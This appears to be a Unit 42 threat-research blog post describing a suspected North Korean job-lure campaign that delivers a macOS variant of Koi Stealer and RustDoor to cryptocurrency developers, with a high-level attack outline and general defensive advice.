North Korean Hackers Target macOS With New Crypto Malware

North Korea’s cyber warfare tactics have evolved once again with the adaptation of a known Windows malware to infiltrate macOS environments. Palo Alto Networks Unit 42 has uncovered a sophisticated campaign in which suspected North Korean hackers deploy a previously undocumented macOS variant of Koi Stealer malware.

This operation, aimed at software developers in the cryptocurrency industry, underscores the increasing adaptability and persistence of North Korean threat actors.

The Campaign: A Sophisticated Social Engineering Threat

Unit 42 researchers have been tracking a campaign that manipulates software developers into installing malware under the guise of a legitimate job recruitment process. North Korean state-sponsored threat actors pose as potential employers, leveraging job platforms, email, and social media to target professionals in cryptocurrency and blockchain industries.

The newly discovered malware is part of a broader social engineering campaign in which attackers trick victims into installing malware disguised as legitimate software updates. Once deployed, the malware steals sensitive credentials, cryptocurrency wallets, and other critical data.

This finding highlights several critical cybersecurity concerns:

• First-ever documented macOS variant of Koi Stealer: Due to the increased targeting of macOS users by North Korea’s hacking groups, we observed an adaptation of Windows malware to macOS.
• Targeted social engineering tactics: This attack aligns with past FBI warnings about North Korea’s sophisticated job-themed cyber lures.
• Rising threat to cryptocurrency firms: The campaign is a direct threat to software developers, cryptocurrency exchanges and financial institutions.

The Growing North Korean Cyber Threat

North Korea’s interest in cryptocurrency is well-documented. Unlike other nation-state threat groups that typically focus on cyber espionage and have narrow targeting aligned with geopolitical interests, North Korea’s cyber operations are uniquely and aggressively financially motivated.

In an effort to fund their regime, they cast a wide net — targeting any individual or organization even remotely connected to cryptocurrency. This opportunistic approach makes them a risk to a broader range of industries, turning virtually anyone dealing in digital assets into a potential target.

While the attack methods are not entirely new, the focus on macOS platforms is a growing threat. According to our telemetry, attackers are focusing on Japan and the US, signaling a deliberate and strategic targeting of key global cryptocurrency and financial markets.

The campaign mirrors tactics seen in previous North Korean cyber espionage operations. Attackers contact software developers under the guise of recruiters, convincing them to install what appears to be an industry-relevant software package. Instead, they unknowingly grant access to Koi Stealer and RustDoor malware, which operate with advanced evasion techniques designed to bypass macOS security features.

The Technical Breakdown: How the Attack Works

Unit 42 researchers uncovered three key phases in this attack:

• Initial infection: Victims execute a fake job interview project within Visual Studio, triggering the download of RustDoor and Koi Stealer malware.
• Persistence and escalation: The malware, once executed, attempts to steal sensitive data, including credentials stored in browser extensions like LastPass.
• Data exfiltration: Attackers collect critical financial information, cryptocurrency wallets, SSH keys, and other confidential data before sending it to a remote command-and-control (C2) server.

Unlike traditional phishing campaigns, which rely on mass email distribution, this attack is more targeted — focusing on individuals with access to cryptocurrency exchanges and blockchain projects.

How Organizations Can Protect Themselves

With social engineering attacks growing more sophisticated, organizations must take proactive steps to defend against threats like Koi Stealer and RustDoor:

• Employee Awareness: Companies should educate employees about phishing and job-themed recruitment scams.
• Zero-Trust Architecture: Organizations should enforce least-privilege access to limit exposure to malicious applications.
• Regular Security Audits: Continuous monitoring and threat hunting can help identify vulnerabilities before they are exploited.

A Call to Action

The discovery of Koi Stealer for macOS together with other recently discovered campaigns carried out by North Korean highlight the need for increased awareness. Nation-state actors are evolving, and defenders must adapt just as quickly. The cryptocurrency industry, in particular, remains a high-value target.